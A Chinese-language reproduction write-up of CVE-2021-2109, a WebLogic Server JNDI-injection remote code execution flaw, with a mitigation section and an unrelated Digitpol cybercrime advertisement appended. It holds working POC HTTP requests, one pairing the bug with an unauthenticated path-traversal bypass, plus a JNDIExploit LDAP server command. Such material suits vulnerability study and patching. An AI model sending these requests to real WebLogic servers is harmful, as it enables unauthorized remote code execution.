2021年1月Oracle发布了安全更新补丁,包含Oracle产品系列中的329个新安全补丁。此次公告中特别提到了,2020年11月1日发布的Oracle WebLogic Server关于CVE-2020-14750漏洞的安全公告。强烈建议客户应用此补丁更新,及此公告中的其他补丁。CVE编号CVE-2021-2109,该漏洞为Weblogic 的远程代码执行漏洞。漏洞主要由JNDI注入,导致攻击者可利用此漏洞远程代码执行。

影响版本如下:

Weblogic Server 10.3.6.0.0

Weblogic Server 12.1.3.0.0

Weblogic Server 12.2.1.3.0

Weblogic Server 12.2.1.4.0

Weblogic Server 14.1.1.0.0

一、CVE-2021-2109 Weblogic Server远程代码执行漏洞复现

使用DOCKER搭建Weblogic Server测试环境,Weblogic Server可以正常访问

1、正常登录后台的情况下进行JNDI注入

第一种情况,需要利用管理员帐号登录Weblogic Server后台,通过BurpSuite抓取登录数据包,获取登录Cookie数据

在本机启动启动LDAP,可在https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11下载,命令如下:

java -jar JNDIExploit-v1.11.jar -i 192.168.131.1

发送Weblogic Server远程代码执行漏洞CVE-2021-2109 JNDI注入POC数据包:

POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

通过cmd变量执行ipconfig系统命令

2、配合Weblogic Server未授权访问后台进行JNDI注入

第二种情况,不需要登录Weblogic Server后台。

需配合Weblogic Server CVE-2020-14750未授权访问漏洞,发送Weblogic Server远程代码执行漏洞CVE-2021-2109 JNDI注入POC数据包:

POST /console/css/%25%32%65%25%32%65%25%32%66/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&cqqhandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

通过cmd变量执行calc.exe,打开系统计算器

二、CVE-2021-2109 Weblogic Server远程代码执行漏洞安全建议

1、禁用T3协议

如果您不依赖T3协议进行JVM通信,可通过暂时阻断T3协议缓解此漏洞带来的影响。

1). 进入Weblogic控制台,在base_domain配置页面中,进入“安全”选项卡页面,点击“筛选器”,配置筛选器。

2). 在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则框中输入:* * 7001 deny t3 t3s。

2、禁止启用IIOP

登陆Weblogic控制台,找到启用IIOP选项,取消勾选,重启生效

3、临时关闭后台/console/console.portal对外访问

4、升级官方安全补丁



Source link

Is your business effected by Cyber Crime?

If a cyber crime or cyber attack happens to you, you need to respond quickly. Cyber crime in its several formats such as online identity theft, financial fraud, stalking, bullying, hacking, e-mail fraud, email spoofing, invoice fraud, email scams, banking scam, CEO fraud. Cyber fraud can lead to major disruption and financial disasters. Contact Digitpol’s hotlines or respond to us online.

Digitpol’s Cyber Crime Investigation Unit provides investigative support to victims of cyber crimes. Digitpol is available 24/7. https://digitpol.com/cybercrime-investigation/

Europe +31558448040
UK +44 20 8089 9944
ASIA +85239733884